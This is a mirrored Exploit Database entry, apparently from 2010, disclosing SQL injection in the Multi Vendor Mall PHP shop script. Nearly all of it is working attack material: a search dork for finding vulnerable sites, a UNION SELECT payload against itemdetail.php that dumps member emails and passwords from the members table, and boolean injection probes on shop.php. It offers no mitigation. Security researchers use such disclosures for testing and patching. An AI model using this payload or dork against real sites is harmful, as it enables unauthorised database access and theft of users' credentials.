Multi Vendor Mall – ‘itemdetail.php?& shop.php’ SQL Injection

• Exploit Database
• 11 阅读

• 作者： CoBRa_21
  日期： 2010-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12755/

• -------------------------------------------------------------------------------------------
  
  Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability
  
  -------------------------------------------------------------------------------------------
  
  Author: CoBRa_21
  
  Script Home: http://www.multishopcms.com
  
  Dork: pages.php?id= "Multi Vendor Mall"
  
  -------------------------------------------------------------------------------------------
  
  Sql Injection:
  
  http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--
  
  
  http://localhost/[path]/shop.php?storeid=77 and 1=2
  http://localhost/[path]/shop.php?storeid=77 and 1=1
  -------------------------------------------------------------------------------------------